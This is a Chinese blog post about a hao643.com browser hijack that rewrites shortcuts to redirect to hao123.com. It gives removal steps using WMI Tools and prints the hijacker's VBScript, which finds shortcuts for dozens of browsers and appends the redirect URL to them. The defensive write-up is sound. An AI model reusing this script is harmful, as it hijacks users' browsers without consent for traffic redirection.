1. 程式人生 > >hao643.com劫持(IE和Chrome等被修改快捷方式跳轉到hao123.com)

hao643.com劫持(IE和Chrome等被修改快捷方式跳轉到hao123.com)

cnblogs path eat ams app .get style 選型 des

最近下載了某個軟件,安裝後IE和Chrome的Startup Page均被重定向到hao123.com。
查看IE和Chrome的配置選型,沒發現問題。
後來發現是快捷方式後邊多了一串字符串 "http://hao643.com/?r=ggggg&m=d40"
刪除後,經過一段時間,還會再次出現。再刪再出現。
不虧是百度旗下的幹將!

那麽怎麽清除呢?
網上中文、英文諸多介紹,既有專殺也有通殺,試了幾個均不理想。
後來,因緣巧合得到了解決方法,如下:
1.下載並安裝WMITools(http://www.pc18.com/soft/15730.html)
2.以管理員身份打開 C:\Program Files (x86)\WMI Tools\wbemeventviewer.exe

3.點擊左上角按鈕register for events
4.OK--OK
5.第1個下拉菜單有3個選擇項:Consumers、Filters、Timers
6.把這3個選擇項下的所有實例全部刪除(右鍵菜單,Delete instance)
//註意,根節點無法刪除,點開到具體的instance
7.去掉所有瀏覽器快捷方式的尾巴--涉及瀏覽器:114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe
8.搞定收工。

參考文章:
http://jingyan.baidu.com/article/0964eca26f47b38285f536c6.html
http://www.cnblogs.com/chenshao/p/6854790.html

具體代碼如下:

 1 On Error Resume Next:
 2 Const link = "http://hao643.com/?r=ggggg&m=d40":
 3 Const link360 = "http://hao643.com/?r=ggggg&m=d40&s=3":
 4 browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe
": 5 lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Admin\Desktop,C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs": 6 browsersArr = split(browsers,","): 7 Set oDic = CreateObject("scripting.dictionary"): 8 For Each browser In browsersArr: 9 oDic.Add LCase(browser), browser: 10 Next: 11 lnkpathsArr = split(lnkpaths,","): 12 Set oFolders = CreateObject("scripting.dictionary"): 13 For Each lnkpath In lnkpathsArr: 14 oFolders.Add lnkpath, lnkpath: 15 Next: 16 Set fso = CreateObject("Scripting.Filesystemobject"): 17 Set WshShell = CreateObject("Wscript.Shell"): 18 For Each oFolder In oFolders: 19 If fso.FolderExists(oFolder) Then: 20 For Each file In fso.GetFolder(oFolder).Files: 21 If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then: 22 Set oShellLink = WshShell.CreateShortcut(file.Path): 23 path = oShellLink.TargetPath: 24 name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path): 25 If oDic.Exists(LCase(name)) Then: 26 If LCase(name) = LCase("360se.exe") Then: 27 oShellLink.Arguments = link360: 28 Else: 29 oShellLink.Arguments = link: 30 End If: 31 If file.Attributes And 1 Then: 32 file.Attributes = file.Attributes - 1: 33 End If: 34 oShellLink.Save: 35 End If: 36 End If: 37 Next: 38 End If: 39 Next:

hao643.com劫持(IE和Chrome等被修改快捷方式跳轉到hao123.com)